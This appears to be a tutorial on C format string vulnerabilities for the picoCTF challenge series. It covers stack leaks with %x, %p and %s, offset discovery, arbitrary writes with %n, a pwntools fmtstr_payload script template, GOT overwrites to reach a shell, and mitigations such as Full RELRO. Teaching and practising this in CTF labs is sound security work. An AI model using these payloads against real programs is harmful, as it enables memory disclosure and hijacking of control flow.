Introduction
A format string vulnerability occurs when a C program passes user-controlled input directly as the first argument to printf or a related function. Instead of treating the input as data to print, printf interprets it as a format string and acts on any % specifiers it contains. An attacker can use this to read arbitrary memory and, in some cases, write to any address in the process.
This vulnerability class is at the heart of the picoCTF format string series: format string 0, format string 1, format string 2, and format string 3. Each challenge adds one more concept. Work through them in order.
How printf works
The printf family of functions reads a format string and consumes additional arguments from the call stack to fill in each format specifier. When called correctly it looks like this:
printf("%s scored %d points", username, score);// The format string is a string literal, not user input.
The vulnerable version passes user input as the format string:
char buf[256];fgets(buf, sizeof(buf), stdin);printf(buf); // BUG: buf is user-controlled
When printf encounters %s in the format string it looks on the stack for the next argument (a pointer to a string) and dereferences it. If the caller never provided that argument, printf reads whatever happens to be on the stack at that position, which is attacker-readable process memory.
printf("%s", buf) is used instead, the input is always treated as a plain string and no specifiers are interpreted.Reading memory with %x and %s
Send %x specifiers to dump stack values as hex integers. Each %x consumes one word from the stack:
$ echo '%x %x %x %x %x %x %x %x' | ./vulnerablef7f9e580 0 0 0 f7f5a700 61616161 25207825 78252078
Use %p instead of %x to get pointer-width output with a 0x prefix, which is cleaner on 64-bit systems:
$ echo '%p %p %p %p %p %p' | ./vulnerable
If you want to read from a specific stack offset without cycling through all the preceding ones, use the positional argument syntax %N$x where N is the index:
$ echo '%6$x' | ./vulnerable # read the 6th stack word$ echo '%6$p' | ./vulnerable # same, as a pointer
To dereference a pointer on the stack and read the string it points to, use %s:
$ echo '%6$s' | ./vulnerable # dereference the 6th stack word as a string
%s will crash the program if the value at the target position is not a valid readable pointer. Use %x or %p first to identify which positions hold addresses, then dereference specific ones.Finding the format string offset
The key skill in format string exploitation is finding the offset at which your own input appears on the stack. Once you know it, you can place an address in the input and use %N$s to dereference it, or %N$n to write to it.
The technique is to start the input with a recognizable marker like AAAA (hex value 0x41414141) and then scan the stack output for that value:
$ echo 'AAAA %x %x %x %x %x %x %x %x %x %x' | ./vulnerableAAAA f7f9e580 0 0 0 f7f5a700 41414141 25207825 ...# ^^^^^^^^# This is our AAAA, at position 6
In the example above, our marker appears at the 6th position. We can confirm this with:
$ echo 'AAAA %6$x' | ./vulnerableAAAA 41414141 # confirmed: offset is 6
On 64-bit systems, use 8-byte markers (e.g. AAAAAAAA, hex 0x4141414141414141) and look for them in the %p output.
Writing with %n
The %n specifier writes the number of bytes printed so far into the pointer argument it consumes. This turns a read vulnerability into an arbitrary write. If you can place a target address at a known stack offset, %N$n will write to it.
The value written equals the number of characters already output by printf. Use width padding to control it. For example, to write the value 100 (0x64):
# Pad to exactly 100 characters before %n# The target address is at stack offset 6printf '%100c%6$n'
To write larger values (like a function address), use %hn (write 2 bytes) or split the write into multiple partial writes, one 2-byte chunk at a time. This is the basis of the GOT (Global Offset Table) overwrite technique used in format string 3.
checksec (part of pwntools) to check whether the binary has RELRO. Full RELRO makes the GOT read-only after dynamic linking, preventing GOT overwrites. Partial RELRO (the default) leaves it writable.Automating with pwntools
pwntools is a Python library for writing exploit scripts. It handles process I/O, socket connections, and format string payload generation:
pip install pwntools
from pwn import *# Connect to a local process or remote serverp = process('./vulnerable')# p = remote('challenge.picoctf.org', 12345)# Send a format string to leak stack valuesp.sendline(b'%p %p %p %p %p %p')leak = p.recvline()print(leak)# Build a format string payload that writes target_value to target_addr# offset = the stack index where your buffer appearspayload = fmtstr_payload(offset, {target_addr: target_value})p.sendline(payload)p.interactive()
The fmtstr_payload function from pwntools builds the entire payload for you, handling the address placement, padding arithmetic, and split writes needed to overwrite arbitrary memory. The only inputs you need are the stack offset and a dictionary of address: value pairs to write.
The picoCTF format string series
Introduces the bug conceptually. A buffer overflow of a format string crashes the program in the right way to print the flag. No memory reading required.
Read a secret value off the stack using %x specifiers. Practice scanning for a recognizable pattern in the leak output.
Overwrite a specific variable in memory using %n. Introduces the concept of writing to a known address by placing it in the input buffer.
Full GOT overwrite. Redirect a library function pointer to system so that the next call to the original function instead spawns a shell.
Mitigations
Modern compilers and operating systems include several defenses against format string exploits:
- -Wformat-security: GCC warns when printf is called with a non-literal format string. Enabled in most production builds.
- Full RELRO: marks the GOT read-only after dynamic linking, preventing GOT overwrites.
- ASLR: randomizes where the stack and libraries are loaded, making it harder to hardcode target addresses. Must be combined with an address leak step.
- Stack canaries: detect adjacent buffer overflows but do not directly mitigate format string writes.
checksec ./binary (pwntools) to see which mitigations are active on a CTF binary. Partial RELRO with no PIE is the classic easy-mode setup; Full RELRO with PIE and ASLR requires leaking an address before writing.Quick reference
| Specifier | Effect |
|---|---|
| %x | Print the next stack word as hex |
| %p | Print the next stack word as a pointer (0x...) |
| %s | Dereference the next stack word as a string pointer |
| %n | Write the bytes-printed count to the next stack pointer |
| %hn | Write 2 bytes (short) instead of 4 |
| %hhn | Write 1 byte |
| %N$x | Print the Nth stack word (1-indexed) as hex |
| %Nc | Print N space characters (controls write value for %n) |
| fmtstr_payload(off, {addr: val}) | pwntools: build a complete write payload |